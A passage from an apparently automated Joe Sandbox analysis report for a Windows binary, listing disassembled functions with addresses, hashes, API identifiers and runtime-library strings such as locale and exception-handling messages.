                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97d15f4b7e4db43da4c1468bb3b0722c14224d7c4c5551d2748ff46b8915a50d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85318E26B0CB46C1FB19BF55E8445B8E371EB54BA0F980631DA1D476E6DE7CE842C320
                                                                                                                                                                                                                                                    Function 00007FF749F7B0DC Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 320COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                    • API String ID: 3523768491-393685449
                                                                                                                                                                                                                                                    • Opcode ID: d269b10b090600505750a3c819ac83394d3d02da0ad2d3e8d51ca689862eccdb
                                                                                                                                                                                                                                                    • Instruction ID: 32496921206359c7d64ca4bd23f3f3e5cb88ac8e060a95ad6dbc9a7d0df74a1e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d269b10b090600505750a3c819ac83394d3d02da0ad2d3e8d51ca689862eccdb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DE1AE72A1C682CAE721BF24D4802ADB7B0FB45749F950275EA8C57BD6DF38E581CB10
                                                                                                                                                                                                                                                    Function 00007FF749F8EA08 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$Value$FreeHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 365477584-0
                                                                                                                                                                                                                                                    • Opcode ID: 4b4b5bc632248bdb433cead8b46ecdca3223bae7e4b6a3fa7c4d12370feff017
                                                                                                                                                                                                                                                    • Instruction ID: 700e03a6d40d2f19bebec8fb508ddc1da085ce1723b903bc19378f833313212f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b4b5bc632248bdb433cead8b46ecdca3223bae7e4b6a3fa7c4d12370feff017
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B110D20F0C242D2FB94BF31A85647AD272AF85BA0FC45535D92F566D6EE2CE4424620
                                                                                                                                                                                                                                                    Function 00007FF749F50120 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 236COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                    • String ID: false$true
                                                                                                                                                                                                                                                    • API String ID: 118556049-2658103896
                                                                                                                                                                                                                                                    • Opcode ID: 972f107c7e3bfc2befb89246360020375a83d43149c605f2503a87af4f1b7fdc
                                                                                                                                                                                                                                                    • Instruction ID: 460e779e375ab92e9aec12567365885aa9eafb1fe32ab83220b91b1773be7429
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 972f107c7e3bfc2befb89246360020375a83d43149c605f2503a87af4f1b7fdc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF917E22B09B46D5EB10EF61D4402ADB3B5FB48798F8A0135DE4C67B9AEF38D606C350
                                                                                                                                                                                                                                                    Function 00007FF749F4CF50 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 220COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 2775327233-1405518554
                                                                                                                                                                                                                                                    • Opcode ID: fd75101fff1ddf6bcefdbd753669c5238395d629f98c874148098408cef4706e
                                                                                                                                                                                                                                                    • Instruction ID: 4900a61ba4bee934fa5f9638174676c949781c5a83dd0517cc0676b921446674
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd75101fff1ddf6bcefdbd753669c5238395d629f98c874148098408cef4706e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99914A22B49B45D9FB10FFA5D450ABCB3B5AB58B88F844036DE4E23B99DE38E511C350
                                                                                                                                                                                                                                                    Function 00007FF749F4FF10 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$AllocLocalLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 1970615557-1405518554
                                                                                                                                                                                                                                                    • Opcode ID: 186519733328dc341932685420c5a8c6a9cbc219543865a61db791bdbc12f68c
                                                                                                                                                                                                                                                    • Instruction ID: 8a6ede817e30285d2f7ccfb706ca6208c56c8f6f9cf2fae988aaeffbb146d99b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 186519733328dc341932685420c5a8c6a9cbc219543865a61db791bdbc12f68c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE515732B0EB01DAEB60FFA0E4506ACB2B4AF44754F894435DE9D27ACADE38D515C364
                                                                                                                                                                                                                                                    Function 00007FF749F43700 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139encryptionCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CertNameString$FreeLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID: 0123456789abcdefghjkmnpqrstvwxyz
                                                                                                                                                                                                                                                    • API String ID: 1194004671-2680470996
                                                                                                                                                                                                                                                    • Opcode ID: d047078aa7d2a75d1bade361f02e47fe51cdf74a91cb01b5719847fcd378c216
                                                                                                                                                                                                                                                    • Instruction ID: e78e4ec684cd2e314ca35b4ae41cb227f42de26c611ca922155b2cfb7e64d2bf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d047078aa7d2a75d1bade361f02e47fe51cdf74a91cb01b5719847fcd378c216
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55419A72B08B82C6EB14AF25E544769A2B0FBA4B94F545231DB9C03BE4DF7CE4A18750
                                                                                                                                                                                                                                                    Function 00007FF749F4FB60 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$AllocLocalLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 1970615557-1405518554
                                                                                                                                                                                                                                                    • Opcode ID: 7866772bbb120e579c19f47f367152b472f64bbf34052f99c866df9876bd0871
                                                                                                                                                                                                                                                    • Instruction ID: fa3e27cfe238083b6775c883f5455055040a89944ee09d19c80367719722df56
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7866772bbb120e579c19f47f367152b472f64bbf34052f99c866df9876bd0871
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF515932B8EA42DAEB14BF60D4506A9B3B5EB54B48F840835EE4D17AC9DF38E5108364
                                                                                                                                                                                                                                                    Function 00007FF749F4FD40 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$AllocLocalLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 1970615557-1405518554
                                                                                                                                                                                                                                                    • Opcode ID: 81da17869bdb53e219f53fe6784221cd970ee4b54f1a9b69c806c506124e01f4
                                                                                                                                                                                                                                                    • Instruction ID: d3a595d72947b5fcd8ecf574b6981945b023bc9cd7b97d0cb1af3d4a4da53cf0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81da17869bdb53e219f53fe6784221cd970ee4b54f1a9b69c806c506124e01f4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB514B33B4EB41DAEB54FF60D4406A973B5EF58B48F844835EA4D13A8ADF38E5608364
                                                                                                                                                                                                                                                    Function 00007FF749F50790 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID: ios_base::failbit set
                                                                                                                                                                                                                                                    • API String ID: 195334829-3924258884
                                                                                                                                                                                                                                                    • Opcode ID: bdc96ef9f32a7c71366f5c729cac4d9e279cf7ae0cb744149326c4ce65fc2f4b
                                                                                                                                                                                                                                                    • Instruction ID: f43b360b5300890176b8f58d148a1b670215483c4f692b8cbe2e937c37e5553f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdc96ef9f32a7c71366f5c729cac4d9e279cf7ae0cb744149326c4ce65fc2f4b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4941BE23A1CB81C5EB00AF25E444369B770FB94B94F995232EE8D037AADF7CE5908740
                                                                                                                                                                                                                                                    Function 00007FF749F6602C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Maklocstr$Getvals
                                                                                                                                                                                                                                                    • String ID: false$true
                                                                                                                                                                                                                                                    • API String ID: 3025811523-2658103896
                                                                                                                                                                                                                                                    • Opcode ID: 7ace635c7ad6ec472de5639fea986f072d22dfd805493997a9e5bc8ab4cbee80
                                                                                                                                                                                                                                                    • Instruction ID: 50975695b87be2f3b7bd8c5cb37e344b1aff43af0cd43f800c74828cb573a2b1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ace635c7ad6ec472de5639fea986f072d22dfd805493997a9e5bc8ab4cbee80
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7417F22B18B81D9F711EF74E4001ED73B0FB48748B855226EE4D27A9AEF38D696C350
                                                                                                                                                                                                                                                    Function 00007FF749F8BCEC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                    • Opcode ID: a72d72f5e5df5979febe86a4c48affdf8c1640c0df6073a32ad95133436f51cf
                                                                                                                                                                                                                                                    • Instruction ID: 631e4aaabd628f71ca856479904ebd04c7cac3b4992f398eb6aabb4b46040824
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a72d72f5e5df5979febe86a4c48affdf8c1640c0df6073a32ad95133436f51cf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24F06D21B1CA02D1FB10BF64E4413B9D370AF89761F941635D56E465E4CF2CD0448720
                                                                                                                                                                                                                                                    Function 00007FF749F7A4DC Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                                                                                                    • Opcode ID: 4b46f25a73863d7cfdd4a5ce638acb544018d902231031f461183a5bc8e6ba65
                                                                                                                                                                                                                                                    • Instruction ID: d948d1bd7f59c661e4e31ab412b8db35bf3b5220eb1bea966baa44431664de90
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b46f25a73863d7cfdd4a5ce638acb544018d902231031f461183a5bc8e6ba65
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FB1812AA0EA42C1EF65FF11D540639E3B1AF44B84F9A84B5EA4D077D5DF3CE4928720
                                                                                                                                                                                                                                                    Function 00007FF749F50560 Relevance: 7.7, APIs: 5, Instructions: 156memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Local$Alloc$Concurrency::cancel_current_taskFree_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1259271893-0
                                                                                                                                                                                                                                                    • Opcode ID: 7314d4313823993fa5e2071c46be05ca7fd90f75f03cd2b4e5bea4768873b97c
                                                                                                                                                                                                                                                    • Instruction ID: f1ae38236c8d469239230a3162d7a429bc63d6a0a2f26508c517a1440128e1da
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7314d4313823993fa5e2071c46be05ca7fd90f75f03cd2b4e5bea4768873b97c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1651C0A1B0CB85D5EB10BF16A5042AAE371EB84FE4F984531DE6C0BBD6DE7CD1418360
                                                                                                                                                                                                                                                    Function 00007FF749F4BC90 Relevance: 7.6, APIs: 5, Instructions: 144memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
